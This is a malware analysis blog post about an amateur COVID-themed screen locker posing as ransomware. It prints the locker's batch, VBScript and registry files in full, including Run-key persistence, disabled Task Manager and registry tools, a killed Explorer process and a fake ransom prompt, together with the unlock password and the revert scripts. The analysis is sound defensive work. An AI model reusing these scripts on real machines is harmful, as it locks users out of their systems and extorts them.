This blog was published on the 21st of April 2020. This article was updated on the 8th of December 2021.
Actors are known to abuse ongoing happenings for their own gain, where the COVID-19 pandemic is not excluded. This article provides insight in an amateuristic ‘ransomware’ sample that uses Windows’ text to speech feature to continuously play Corona virus to further scare the user.
The sample was obtained after a request for help was posted in the Malware Research group on Telegram, after a user was infected with this malware. It seems that my public submission on the 14th of April 2020 lead to the file to be on VirusTotal, where S!Ri found it.
At first, observations regarding the sample on the infected machine will be given. After that, the sample will be analysed in the usual step-by-step manner. Lastly, information on the actor is given.
Table of contents
Observations
A video that showed the aftermath of the infection was posted by the user in the Malware Research group on Telegram. In this video, a message related to the Corona virus was shown prior to the login screen. Once logged in, a custom background was shown, the text to speech capability played Corona virus, and a message box that requested the password to decrypt the files popped up. The message box looks like the ones Visual Basic Scripts display. Text to speech is commonly used to scare the user.
Per the GNU strings utility, the sample is a Windows executable: PE32 executable (GUI) Intel 80386, for MS Windows.
Sample information
Below, the MD-5, SHA-1, and SHA-256 hashes of the sample are given. One can download the sample from MalShare, Malware Bazaar, or VirusBay.
MD-5: 09387dad1341f534ad51966168c0e4af SHA-1: 39a58879b0327145f5eb94caa83227564b11abde SHA-256: 01157c3e056d2040250598bc9b4aac8b4ad8b7f2c595381d320290dd79b8317d
Sample analysis
Using Exeinfo PE version 0.0.5.3, the executable is identified as a Smart Install Maker v5.04 installer. Installers contain compressed copies of the files that will be written to the disk. As such, one can extract the resources from the installer without running it. A tool to do this, is UniExtract2. A plug-in is required to successfully extract resources from the Smart Install Maker file, as is explained in this Github issue.
Several Visual Basic Scripts, Batch files, and an executable are present. Note that the file extensions are not correct. Using GNU’s file utility, one can quickly identify the file types. The output of the file utility is given below.
allwh.reg: PE32 executable (GUI) Intel 80386, for MS Windows anti.exe: ASCII text, with very long lines, with CRLF line terminators antiwh.vbs: ASCII text, with CRLF line terminators bara.bat: DOS batch file, ASCII text, with CRLF line terminators bar.vbs: DOS batch file, ASCII text, with CRLF line terminators diex.BAT: ASCII text, with CRLF line terminators speakwh.vbs: DOS batch file, ASCII text, with CRLF line terminators Uninstall.exe: directory Uninstall.ini: Little-endian UTF-16 Unicode text, with CRLF, CR line terminators wh.bat: JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=782, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1355], baseline, precision 8, 1355x782, frames 3 wh.jpg: MS Windows icon resource - 5 icons, 16x16, 32 bits/pixel, 24x24, 32 bits/pixel wifi.ico: PE32 executable (GUI) Intel 80386, for MS Windows
An online sandbox will provide information on the execution order of the given files, as can be seen on Any.Run. The files are copied to C:\Program Files\vb\wifi hacker\, where wh.bat is first executed. Based on the execution tree in Any.Run, one can see that this Batch file uses the attrib utility.
The extracted files have incorrect names and extensions, but based on the attrib calls, it becomes obvious that the speakwh.vbs file corresponds with this file. Instead of deducting which file is executed next, one can also check the content of the scripts (and the hashes) on Any.Run. As this is much quicker and less of a hassle, the scripts that are present in the sandbox are used within this article. The script is given below.
@echo off cls attrib c:\wh\*.* -r -a -s -h cls del c:\wh\*.* /f /q cls rd c:\wh md c:\awh md c:\wh copy wh.jpg c:\wh copy antiwh.vbs c:\wh copy speakwh.vbs c:\wh copy wh.ico c:\wh copy diebs.bat c:\wh copy diex.bat c:\wh copy anti.exe c:\awh copy dcc.bat c:\wh attrib c:\wh +r +a +s +h cls bar.vbs cd\ exit
The script removes the read-only, archive, system, and hidden attributes of all files within the C:\wh\ folder using the attrib command. All files within that folder are then forcefully and quitely deleted using the del command. The rd command, which stands for Remove Directory, is used to remove the folder. The md command which stands for Make Directory, is used to create C:\awh and C:\wh, after which the files are copied from the current directory to the C:\wh folder. After that, the read-only, archive, system, and hidden attributes are added to all files in the C:\wh folder. At last, the bar.vbs file is executed. The script is given below.
set shell = CreateObject("Wscript.Shell") shell.run "bara.bat"
The script simply uses a shell to start another Batch script, which is given below.
@echo off cls del allwh.reg /f /q del antiwh.vbs /f /q del bar.vbs /f /q del rytwh.vbs /f /q del speakwh.vbs /f /q del wh.bat /f /q del diex.bat /f /q del diebs.bat /f /q del anti.exe /f /q del wh.jpg /f /q del wifi.exe /f /q del wh.bat /f /q cls shutdown -l exit
All files are forcefully and quietly deleted from the installation directory, after which the computer is shutdown immediately. Note that the installer altered several registry keys, as is stated in allwh.reg file, which is given below.
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System] "legalnoticecaption"="you are infected of corona virus.." "legalnoticetext"="computertricks2018@gmail.com" [HKEY_CURRENT_USER\Control Panel\Desktop] "Wallpaper"="c:\\wh\\wh.jpg" [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] "r"="c:\\wh\\speakwh.vbs" "o"="c:\\wh\\antiwh.vbs" "t"="c:\\wh\\diex.bat" [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] "StartMenuLogOff"=dword:00000001 "NoDrives"=dword:03ffffff "NoClose"=dword:00000001 "HideClock"=dword:00000001 "NoViewContext"=dword:00000001 "NoStartMenuPinnedList"=dword:00000001 "NoStartMenuMorePrograms "=dword:00000001 "NoDesktop"=dword:00000001 "NocontrolPanel"=dword:00000001 "NoRun"=dword:00000001 "NoWinkeys"=dword:00000001 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] "disabletaskmgr"=dword:00000001 "disableregistrytools"=dword:00000001 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\USBSTOR] "Start"=dword:00000004
The legal notice that is shown before logging in, is set to the message that was described in the observations. The wallpaper is also altered. Three files (speakwh.vbs, antiwh.vbs, and diex.bat) are set to run when the system starts. By setting several policies, the user is severely limited in the possible actions on the device. Additionally, the taskmanger, registry editing, and external USB drives are disabled.
Once rebooted, the scripts in the startup order are executed. The speakwh.vbs script is given below.
Dim speaks, speech do speaks=" corona virus" Set speech=CreateObject("sapi.spvoice") speech.Speak speaks loop
The speech API is used to play Corona virus in and endless loop. Below, the diex.bat script is given.
@ECHO OFF CLS cd\ cd.. cd windows\system32 TASKKILL /F /Im explorer.exe CLS cd.. EXIT
This script needlessly changes the directory to the system32 folder, after which it kills the explorer.exe process using the taskkill command, where the /F flag is used to forcefully stop the process and the /Im flag is used to specify the image name of the process to kill.
The third and final file that is put in the startup order, named antiwh.vbs, is given below.
Option explicit Dim pass Do pass=inputbox("All your files has been encrypted by corona virus. No one can recover your files without my decryption code. computerdestroyer0108@gmail.com Code to Decrypt") if pass="vb" then exit do elseif pass="" then msgbox "dont leave field blank" elseif pass<>"wire" then msgbox "incorrect code ",vbcritical end If loop dim obj set obj=createobject("wscript.shell") obj.run"explorer.exe"
The previously observed message box is created by this script. In here, the hard-coded password, which equals vb, can be observed. Only if the password is filled in, the explorer.exe process is started. The claim that all files have been encrypted, are false, as no encryption took place.
There is one more file, named anti.exe. This file is yet another Smart Install Maker installer. Executing this installer in a safe environment shows that the installer requires a password. This password is the same as the one that is requested in the message box: vb. Extracting the files from the files from this installer shows two more files that are executed by the second installer. One contains the registry command to revert all changes that were made before, as can be seen below.
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System] "legalnoticecaption"="you are safe.." "legalnoticetext"=" " [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] "StartMenuLogOff"=dword:00000000 "NoDrives"=dword:03000000 "NoClose"=dword:00000000 "HideClock"=dword:00000000 "NoViewContext"=dword:00000000 "NoStartMenuPinnedList"=dword:00000000 "NoStartMenuMorePrograms "=dword:00000000 "NoDesktop"=dword:00000000 "NocontrolPanel"=dword:00000000 "NoRun"=dword:00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] "disabletaskmgr"=dword:00000000 "disableregistrytools"=dword:00000000 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\USBSTOR] "Start"=dword:00000003
Note that the legal notice text is replaced to indicate that the user is safe. The other file is a Batch script, which is given below.
@echo off cd\ cd.. cls attrib c:\wh\*.* -r -a -s -h cls del c:\wh\*.* /f /q cls rd c:\wh pause s cd\ CLS cd\ cd.. cls color 1b echo ������������������������������������������������������������������������������� echo ������������������������������������������������������������������������������� echo ���� ���� echo ���� Dcc Batch 2000 ���� echo ����=======================================================================���� echo ���� System free!!!!!! ���� echo ����=======================================================================���� echo ���� For Educational Purposes Only ���� echo ���� Talisay Camarines Norte systemdestroyer0108@gmail.com ���� echo ����=======================================================================���� echo ������������������������������������������������������������������������������� echo ������������������������������������������������������������������������������� echo. ping localhost -n 20>nul exit EXIT
This script removes all files in the C:\wh folder, after which it is also removed. The ping towards the local host is done 20 times, without printing the output. This is used as a timer, before the script is finished and the console dialog automatically closed.
The disclaimer does not seem to be meant at all, as its only mentioned in the cleanup note. Information on the actor is given below.
Actor information
The mentioned location, Talisay, is a municipality in the Philippines. This might be an indication of the location of the author, but this evidence is circumstantial at best.
When searching for the e-mail addresses that are given, one will find a YouTube channel named System Destroyer. On this channel, several videos are present where the actor showcases samples. Based on the videos, it seems that the locker that is described in this article, is a combined effort of several techniques that are shown in the videos. Note that there scripts also refer to files that do not exist, which might indicate copy-pasted code.
Conclusion
The actor plays into the current trends and events by using the Corona virus as a name. The quality of the code and malware is low, and the claim that files are encrypted is incorrect. The forced reboot of the system breaks some sandboxes, especially free ones. Even prior to the reboot, the activity on the computer is clearly malicious.
To contact me, you can e-mail me at [info][at][maxkersten][dot][nl], or DM me on Twitter @Libranalysis.